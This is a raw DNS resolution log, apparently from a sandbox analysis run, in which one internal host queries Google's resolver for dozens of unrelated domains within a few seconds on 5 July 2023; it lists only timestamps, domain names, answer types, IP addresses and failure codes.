                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.391397953 CEST8.8.8.8192.168.2.60x32c6No error (0)midap.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.391397953 CEST8.8.8.8192.168.2.60x32c6No error (0)midap.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.391397953 CEST8.8.8.8192.168.2.60x32c6No error (0)midap.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.394013882 CEST8.8.8.8192.168.2.60xa82fNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.394013882 CEST8.8.8.8192.168.2.60xa82fNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.394013882 CEST8.8.8.8192.168.2.60xa82fNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.435957909 CEST8.8.8.8192.168.2.60x4712Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.481120110 CEST8.8.8.8192.168.2.60x8ac4No error (0)rkengg.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.481120110 CEST8.8.8.8192.168.2.60x8ac4No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.481120110 CEST8.8.8.8192.168.2.60x8ac4No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.481120110 CEST8.8.8.8192.168.2.60x8ac4No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.603455067 CEST8.8.8.8192.168.2.60x88eaNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.647850037 CEST8.8.8.8192.168.2.60xfc41No error (0)aiolos-sa.gr188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.647850037 CEST8.8.8.8192.168.2.60xfc41No error (0)aiolos-sa.gr188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.751975060 CEST8.8.8.8192.168.2.60xcecNo error (0)anduran.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.751975060 CEST8.8.8.8192.168.2.60xcecNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.751975060 CEST8.8.8.8192.168.2.60xcecNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.751975060 CEST8.8.8.8192.168.2.60xcecNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.767534018 CEST8.8.8.8192.168.2.60x1bbfNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.767534018 CEST8.8.8.8192.168.2.60x1bbfNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.835992098 CEST8.8.8.8192.168.2.60xb7e3Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.845022917 CEST8.8.8.8192.168.2.60x6f81No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.920815945 CEST8.8.8.8192.168.2.60xddbbNo error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.933439016 CEST8.8.8.8192.168.2.60x5be3Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.984980106 CEST8.8.8.8192.168.2.60x6dfNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.025432110 CEST8.8.8.8192.168.2.60xc1c4No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.114506006 CEST8.8.8.8192.168.2.60xb68cNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.117610931 CEST8.8.8.8192.168.2.60xbc46No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.160914898 CEST8.8.8.8192.168.2.60x17d3No error (0)arowines.com75.2.18.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.184026003 CEST8.8.8.8192.168.2.60xe1a3No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.205535889 CEST8.8.8.8192.168.2.60x2e3fNo error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.205535889 CEST8.8.8.8192.168.2.60x2e3fNo error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.205535889 CEST8.8.8.8192.168.2.60x2e3fNo error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.222115040 CEST8.8.8.8192.168.2.60x5f50Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.434792995 CEST8.8.8.8192.168.2.60x1ab2No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.490989923 CEST8.8.8.8192.168.2.60x7f7Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.494385958 CEST8.8.8.8192.168.2.60x7ad8No error (0)dzm.cz83.167.255.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.496990919 CEST8.8.8.8192.168.2.60x1a4eNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.529505968 CEST8.8.8.8192.168.2.60x79c0Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.587841988 CEST8.8.8.8192.168.2.60x174bNo error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.608561993 CEST8.8.8.8192.168.2.60xde86Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.611161947 CEST8.8.8.8192.168.2.60x42fbNo error (0)simetar.com172.67.146.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.611161947 CEST8.8.8.8192.168.2.60x42fbNo error (0)simetar.com104.21.79.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.612158060 CEST8.8.8.8192.168.2.60x9a15Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.676018953 CEST8.8.8.8192.168.2.60x8761No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.679269075 CEST8.8.8.8192.168.2.60x3262No error (0)websy.com34.98.99.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.707906008 CEST8.8.8.8192.168.2.60xcec5Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.735244989 CEST8.8.8.8192.168.2.60xebc2No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.769360065 CEST8.8.8.8192.168.2.60x81edNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.839360952 CEST8.8.8.8192.168.2.60xf54dNo error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.870105982 CEST8.8.8.8192.168.2.60x5cdeNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.879045963 CEST8.8.8.8192.168.2.60xa548No error (0)tabbles.net80.211.41.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.890487909 CEST8.8.8.8192.168.2.60xb219No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.933130980 CEST8.8.8.8192.168.2.60xff69Server failure (2)awal.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.964812994 CEST8.8.8.8192.168.2.60xbd1dNo error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.991527081 CEST8.8.8.8192.168.2.60xcb04No error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.991527081 CEST8.8.8.8192.168.2.60xcb04No error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.010514021 CEST8.8.8.8192.168.2.60xf8f8No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.010514021 CEST8.8.8.8192.168.2.60xf8f8No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.027838945 CEST8.8.8.8192.168.2.60x8b8cServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.208816051 CEST8.8.8.8192.168.2.60xeddfNo error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.208816051 CEST8.8.8.8192.168.2.60xeddfNo error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.208816051 CEST8.8.8.8192.168.2.60xeddfNo error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.208816051 CEST8.8.8.8192.168.2.60xeddfNo error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.215684891 CEST8.8.8.8192.168.2.60x6a59No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.225939035 CEST8.8.8.8192.168.2.60x7103No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.237051964 CEST8.8.8.8192.168.2.60x4cddNo error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.237051964 CEST8.8.8.8192.168.2.60x4cddNo error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.237051964 CEST8.8.8.8192.168.2.60x4cddNo error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.289253950 CEST8.8.8.8192.168.2.60xca9dServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.395037889 CEST8.8.8.8192.168.2.60x93c6Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.470643044 CEST8.8.8.8192.168.2.60xff69No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.555847883 CEST8.8.8.8192.168.2.60x2b3dNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.555847883 CEST8.8.8.8192.168.2.60x2b3dNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.571223974 CEST8.8.8.8192.168.2.60x2084No error (0)dspears.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.571223974 CEST8.8.8.8192.168.2.60x2084No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.571223974 CEST8.8.8.8192.168.2.60x2084No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.571223974 CEST8.8.8.8192.168.2.60x2084No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.633493900 CEST8.8.8.8192.168.2.60xcd09Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.818618059 CEST8.8.8.8192.168.2.60xc84fNo error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.873594046 CEST8.8.8.8192.168.2.60xa6b5Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.886395931 CEST8.8.8.8192.168.2.60xe311No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.901611090 CEST8.8.8.8192.168.2.60xf0c7No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.949094057 CEST8.8.8.8192.168.2.60x871eNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.990540028 CEST8.8.8.8192.168.2.60xd6b8No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.990540028 CEST8.8.8.8192.168.2.60xd6b8No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.990540028 CEST8.8.8.8192.168.2.60xd6b8No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.990540028 CEST8.8.8.8192.168.2.60xd6b8No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.042251110 CEST8.8.8.8192.168.2.60x5a06No error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.042251110 CEST8.8.8.8192.168.2.60x5a06No error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.055864096 CEST8.8.8.8192.168.2.60x1b91No error (0)ifesnet.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.055864096 CEST8.8.8.8192.168.2.60x1b91No error (0)ifesnet.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.096206903 CEST8.8.8.8192.168.2.60x45c7No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.096206903 CEST8.8.8.8192.168.2.60x45c7No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.096206903 CEST8.8.8.8192.168.2.60x45c7No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.096206903 CEST8.8.8.8192.168.2.60x45c7No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.098351955 CEST8.8.8.8192.168.2.60xed32Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.104402065 CEST8.8.8.8192.168.2.60x6b02Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.146454096 CEST8.8.8.8192.168.2.60x36ceServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.155319929 CEST8.8.8.8192.168.2.60x546cName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.162620068 CEST8.8.8.8192.168.2.60xed99No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.166539907 CEST8.8.8.8192.168.2.60xa07dNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.175021887 CEST8.8.8.8192.168.2.60x4f94No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.175021887 CEST8.8.8.8192.168.2.60x4f94No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.263641119 CEST8.8.8.8192.168.2.60x1d25No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.284487963 CEST8.8.8.8192.168.2.60xd6a2No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.284487963 CEST8.8.8.8192.168.2.60xd6a2No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.341758966 CEST8.8.8.8192.168.2.60xb753No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.363693953 CEST8.8.8.8192.168.2.60xcdb3Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.426378012 CEST8.8.8.8192.168.2.60x4287Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.443897963 CEST8.8.8.8192.168.2.60xec53Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.529963970 CEST8.8.8.8192.168.2.60xffbaNo error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.537117958 CEST8.8.8.8192.168.2.60xe8No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.568404913 CEST8.8.8.8192.168.2.60xd88fNo error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.568404913 CEST8.8.8.8192.168.2.60xd88fNo error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.575432062 CEST8.8.8.8192.168.2.60x648fNo error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.575432062 CEST8.8.8.8192.168.2.60x648fNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.575432062 CEST8.8.8.8192.168.2.60x648fNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.575432062 CEST8.8.8.8192.168.2.60x648fNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.583440065 CEST8.8.8.8192.168.2.60x445Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.691543102 CEST8.8.8.8192.168.2.60x79ddNo error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.720086098 CEST8.8.8.8192.168.2.60x2f1No error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.864381075 CEST8.8.8.8192.168.2.60x7744No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.065896034 CEST8.8.8.8192.168.2.60x6f6fNo error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.065896034 CEST8.8.8.8192.168.2.60x6f6fNo error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.065896034 CEST8.8.8.8192.168.2.60x6f6fNo error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.113265991 CEST8.8.8.8192.168.2.60xd93dNo error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.113265991 CEST8.8.8.8192.168.2.60xd93dNo error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.209227085 CEST8.8.8.8192.168.2.60xd7e2No error (0)awal.ws127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.356245041 CEST8.8.8.8192.168.2.60xe73eNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.430459976 CEST8.8.8.8192.168.2.60x4de9No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.672923088 CEST8.8.8.8192.168.2.60x5c63No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.672923088 CEST8.8.8.8192.168.2.60x5c63No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.672923088 CEST8.8.8.8192.168.2.60x5c63No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.753369093 CEST8.8.8.8192.168.2.60xed32Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.774930000 CEST8.8.8.8192.168.2.60x1892No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.914345026 CEST8.8.8.8192.168.2.60xe9faServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.918808937 CEST8.8.8.8192.168.2.60x459cNo error (0)assideum.com52.219.178.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.978235006 CEST8.8.8.8192.168.2.60xdf76No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.016484976 CEST8.8.8.8192.168.2.60x2e98No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.044485092 CEST8.8.8.8192.168.2.60x84e4No error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.063576937 CEST8.8.8.8192.168.2.60xa2bdNo error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.157051086 CEST8.8.8.8192.168.2.60x7a00No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.171452045 CEST8.8.8.8192.168.2.60x98dcNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.203157902 CEST8.8.8.8192.168.2.60xbfe9No error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.282241106 CEST8.8.8.8192.168.2.60x1476Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.294682980 CEST8.8.8.8192.168.2.60x3fd5No error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.328761101 CEST8.8.8.8192.168.2.60x85a9No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.381064892 CEST8.8.8.8192.168.2.60x8150No error (0)ascc.org.au203.210.102.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.383793116 CEST8.8.8.8192.168.2.60xff5dNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.383793116 CEST8.8.8.8192.168.2.60xff5dNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.385245085 CEST8.8.8.8192.168.2.60xc38fNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.385245085 CEST8.8.8.8192.168.2.60xc38fNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.385245085 CEST8.8.8.8192.168.2.60xc38fNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.385245085 CEST8.8.8.8192.168.2.60xc38fNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.386832952 CEST8.8.8.8192.168.2.60x52acNo error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.389569044 CEST8.8.8.8192.168.2.60x6cfcNo error (0)adventist.ro49.12.155.123A (IP address)IN (0x0001)false
